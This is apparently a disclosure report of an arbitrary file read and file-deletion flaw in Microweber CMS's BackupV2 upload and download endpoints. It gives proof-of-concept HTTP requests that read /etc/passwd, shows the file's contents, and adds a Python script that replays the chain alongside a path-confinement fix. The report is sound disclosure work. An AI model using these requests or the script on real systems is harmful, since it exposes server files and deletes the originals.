External Control of File Name or Path in microweber/microweber
Jan 29th 2022
In the Microweber CMS, two endpoints of the BackupV2 module can be chained into an arbitrary file read (reported here as local file inclusion): the `src` parameter of the upload endpoint is treated as a server-side path and is not confined to any directory.
When logged in as administrator, we can "upload" any file readable by the web server process from the operating system into the backups folder. On the test host the backup files are located in /var/www/microweber/storage/backup_content/. The file is moved rather than copied, so the original disappears from its location.
Proof of Concept
- Upload /etc/passwd file into the backups folder.
```http
GET /api/BackupV2/upload?src=/etc/passwd
Host: 192.168.188.132
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://192.168.188.132/admin/view:modules/load_module:admin__backup_v2
Cookie: -- snippet --
```
- Read the file from the backups folder.
```http
GET /api/BackupV2/download?file=passwd
Host: 192.168.188.132
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://192.168.188.132/admin/view:modules/load_module:admin__backup_v2
Cookie: -- snippet --
```
The response body is the contents of /etc/passwd:

```
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
-- snippet --
```
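The two-step chain above, together with the path-confinement check that would close it, as an added Python example that is not part of the original report and not Microweber's own code. The endpoints, the `src` and `file` parameter names, the host and the backups path are taken from the report; the cookie value, the `fetch` hook (so the chain can be exercised without a target) and the helper names are assumptions made here.

```python
"""
Added example: replays the two-step BackupV2 chain from the report and shows
the path-confinement check that would close it. Not Microweber code.
"""
import os
import posixpath
import tempfile
from urllib.parse import quote
from urllib.request import Request, urlopen

HOST = "http://192.168.188.132"                            # host from the report
BACKUP_DIR = "/var/www/microweber/storage/backup_content"  # path from the report


def upload_url(base, src):
    # Step 1: 'src' is a server-side path; nothing confines it to a directory.
    return f"{base}/api/BackupV2/upload?src={quote(src)}"


def download_url(base, name):
    # Step 2: 'file' is looked up inside the backups folder.
    return f"{base}/api/BackupV2/download?file={quote(name)}"


def backup_name(src):
    # The report shows /etc/passwd surfacing as 'passwd' in the backups folder.
    return posixpath.basename(src)


def http_get(url, cookie):
    # Real transport; the admin session cookie value is an assumption.
    req = Request(url, headers={"Cookie": cookie, "Accept": "*/*"})
    with urlopen(req, timeout=10) as resp:
        return resp.read()


def read_file_via_backup(base, src, cookie, fetch=http_get):
    """Move `src` into the backups folder, then download it.
    Returns (urls_used, body). `fetch` is a hypothetical hook so the chain
    can be exercised offline. Note that step 1 deletes `src` on the server."""
    urls = [upload_url(base, src), download_url(base, backup_name(src))]
    fetch(urls[0], cookie)
    return urls, fetch(urls[1], cookie)


# --- the fix: confine both parameters to the backups directory ---------------

def resolve_in_backup_dir(backup_dir, user_value):
    """Return the absolute path if `user_value` names a file inside
    `backup_dir`, else None. Rejects absolute paths, '..' segments and
    symlinks that resolve outside the directory."""
    root = os.path.realpath(backup_dir)
    # os.path.join discards `root` when user_value is absolute, so an
    # absolute path lands outside root and is rejected by the check below.
    candidate = os.path.realpath(os.path.join(root, user_value))
    if candidate == root or os.path.commonpath([root, candidate]) != root:
        return None
    return candidate


def is_confined(backup_dir, user_value):
    return resolve_in_backup_dir(backup_dir, user_value) is not None


def symlink_escape_is_rejected():
    """A symlink planted inside the backups folder that points at /etc/passwd
    must not be accepted either; realpath follows it before the check."""
    with tempfile.TemporaryDirectory() as tmp:
        os.symlink("/etc/passwd", os.path.join(tmp, "passwd"))
        return not is_confined(tmp, "passwd")


if __name__ == "__main__":
    cookie = "PHPSESSID=<admin session>"  # assumption: a valid admin session
    urls, body = read_file_via_backup(HOST, "/etc/passwd", cookie)
    print("\n".join(urls))
    print(body.decode(errors="replace")[:200])
```

The check rejects both `src=/etc/passwd` and traversal such as `../../etc/passwd`, and a symlink inside the backups folder is resolved before the comparison, so it cannot be used to smuggle a file out. Independently of the check, the upload endpoint should copy rather than move, so that a rejected or mistaken request cannot destroy the source file.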
Chained together, the two endpoints give an authenticated administrator an arbitrary read of any file the web server process can open, which can be combined with other weaknesses to gain access to the server. Because the upload endpoint moves the source file rather than copying it, the original is deleted after "uploading", so files can be lost: pointing `src` at a file in the webroot removes it, and the web application may then stop responding to HTTP requests (denial of service).
@maintainer @admin any update?
Our automated notification system will continue to reach out to the maintainers. Please get in touch with us once the report has gone stale, and we will manually reach out to the maintainers on your behalf ♥️
Hello, this issue has been fixed, thanks for the report.
@maintainer Hello Peter, the commit does not seem to be the solution.